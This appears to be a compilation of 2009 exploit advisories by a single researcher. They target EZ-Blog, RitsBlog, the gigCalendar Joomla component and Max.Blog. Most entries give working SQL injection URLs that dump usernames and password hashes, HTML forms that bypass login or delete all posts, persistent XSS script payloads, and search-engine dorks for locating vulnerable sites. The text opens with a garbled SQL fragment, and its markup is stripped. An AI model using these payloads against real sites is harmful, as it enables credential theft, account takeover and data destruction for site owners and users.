2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1# Server: target_server
EZ-Blog Beta 1 Multiple SQL Injection
*** Salvatore drosophila Fresta *** Application: EZ-Blog http://sourceforge.net/projects/ez-blog/ Version:Beta 1 Bug: * Multiple SQL Injection Exploitation: Remote Date:1 Mar 2009 Discovered by: Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com * - BUGS SQL Injection: Requisites: magic_quotes_gpc = off This is a crazy application because it not require authentication for posting, deleting, etc. and it is entirely vulnerable to SQL Injection, as follows: http://site/path/public/view.php?storyid=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10%23 There aren't hight reserved information on the database, but it is possible to cause inconvenience. The following injection allow to delete all posts: form action=http://site/path/admin/remove.php; method=POST input type=hidden name=kill value=1'or'1'='1 input type=hidden name=confirm value=1 input type=hidden name=rm value=true input type=submit value=Exploit /form * -- Salvatore drosophila Fresta CWNP444351
RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability / XSS Persistent Vulnerability
*** Salvatore drosophila Fresta *** [+] Application: RitsBlog [+] Version: 0.4.2 [+] Website: http://sourceforge.net/projects/ritsblog/ [+] Bugs: [A] SQL Injection [B] XSS Persistent [+] Exploitation: Remote [+] Date: 02 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu - [1] Bugs - [2] Code - [3] Fix * [+] Bugs - [A] SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: ritsBlogAdmin.class.php This blog is entirely vulnerable to SQL Injection. The following is the vulnerable query that can be used to bypass authentication. In jobs.php: if ($_GET[j] == login){ if ($blog - login($_GET[p])){ $_SESSION[loggedin] = ok; $_SESSION[userID] = $blog - userID; echo Password found. Loging in...; In ritsBlogAdmin.class.php: function login($password){ global $db; $sql = select * from users where secretWord = '$password'; ... } - [B] XSS Persistent [-] Requisites: none [-] File affected: ritsBlogAdmin.class.php In jobs.php: if ($_POST[j] == addComment){ echo $blog - addComment($_POST[id], $_POST[name], $_POST[body]); } In ritsBlogAdmin.class.php function addComment($id, $name, $body){ global $db; $sql = INSERT INTO comments (name, postID, date, text) VALUES(' . addslashes($name) . ',' . $id . ',NOW(),' . addslashes($body) . '); ... } * [+] Code - [A] SQL Injection http://www.site.com/path/blogAdmin/jobs.php?j=loginp=1'or'1'='1 - [B] XSS Persistent It is possible using forms in the index.php or to send over POST method the following values: ?j=addCommentid=54name=mynamebody=scriptalert('XSS');/script or ?j=addCommentid=54name=scriptalert('XSS');/scriptbody=body * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351
gigCalendar Joomla Component 1.0 SQL Injection
*** Salvatore drosophila Fresta *** Application:gigCalendar Joomla Component 1.0 http://joomlacode.org/gf/project/gigcalendar/ Version:gigCalendar 1.0 Bug:* SQL Injection Exploitation: Remote Dork: inurl:index.php?option=com_gigcal Date: 21 Feb 2009 Discovered by:Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com * - BUGS SQL Injection: Requisites: magic_quotes_gpc = off File affected: banddetails.php This bug allows a guest to view username and password of a registered user. http://www.site.com/path/index.php?option=com_gigcaltask=detailsgigcal_bands_id=-1' UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23 * -- Salvatore drosophila Fresta CWNP444351
gigCalendar 1.0 (banddetails.php) Joomla Component SQL Injection
*** Salvatore drosophila Fresta *** Application:gigCalendar Joomla Component 1.0 http://joomlacode.org/gf/project/gigcalendar/ Version:gigCalendar 1.0 Bug:* SQL Injection Exploitation: Remote Dork: inurl:index.php?option=com_gigcal Date: 21 Feb 2009 Discovered by: Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com * - BUGS SQL Injection: Requisites: magic_quotes_gpc = off File affected: banddetails.php This bug allows a guest to view username and password of a registered user. http://www.site.com/path/index.php?option=com_gigcaltask=detailsgigcal_bands_id=-1' UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23 * -- Salvatore drosophila Fresta CWNP444351
gigCalendar 1.0 (venuedetails.php) Joomla Component SQL Injection
*** Salvatore drosophila Fresta *** Application:gigCalendar Joomla Component 1.0 http://joomlacode.org/gf/project/gigcalendar/ Version:gigCalendar 1.0 Bug:* SQL Injection Exploitation: Remote Dork: inurl:index.php?option=com_gigcal Date: 21 Feb 2009 Discovered by:Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com * - BUGS SQL Injection: Requisites: magic_quotes_gpc = off File affected: venuedetails.php This bug allows a guest to view username and password of a registered user. http://www.site.com/path/index.php?option=com_gigcaltask=detailsgigcal_venues_id=-1' UNION ALL SELECT 1,concat('username: ', username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23 * -- Salvatore drosophila Fresta CWNP444351
Max.Blog = 1.0.6 (offline_auth.php) Offline Authentication Bypass
### Salvatore drosophila Fresta ### Application:Max.Blog http://www.mzbservices.com Version:Max.Blog = 1.0.6 Bug:* Offline Authentication Bypass Exploitation: Remote Dork: intext:Powered by Max.Blog Date: 27 Jan 2009 Discovered by: Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com - BUGS Offline Authentication Bypass Exploit: Requisites: magic quotes = off File affected: offline_auth.php This bug allows a guest to bypass an offline authentication service using SQL Injection vulnerability. - CODE html head title Salvatore drosophila Fresta - Max.Blog = 1.0.6 Offline Authentication Bypass Exploit /title /head body form action=http://www.site.com/path/offline_auth.php; method=POST input type=text name=username value=admin'# size=15 input type=hidden name=password input type=submit value=Go! /form /body /html -- Salvatore drosophila Fresta CWNP444351
Max.Blog = 1.0.6 (show_post.php) SQL Injection Vulnerability
### Salvatore drosophila Fresta ### Application:Max.Blog http://www.mzbservices.com Version:Max.Blog = 1.0.6 Bug:* SQL Injection Exploitation: Remote Dork: intext:Powered by Max.Blog Date: 20 Jan 2009 Discovered by: Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com - BUGS SQL Injection: File affected: show_post.php This bug allows a guest to view username and password (md5) of a registered user with the specified id (usually 1 for the admin) http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23 -- Salvatore drosophila Fresta CWNP444351
Max.Blog = 1.0.6 (submit_post.php) SQL Injection Vulnerability
### Salvatore drosophila Fresta ### Application:Max.Blog http://www.mzbservices.com Version:Max.Blog = 1.0.6 Bug:* SQL Injection Exploitation: Remote Dork: intext:Powered by Max.Blog Date: 27 Jan 2009 Discovered by: Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com - BUGS SQL Injection: Requisites: magic quotes = off File affected: submit_post.php This bug allows a registered user to view username and password (md5) of a registered user with the specified id (usually 1 for the admin) http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23 -- Salvatore drosophila Fresta CWNP444351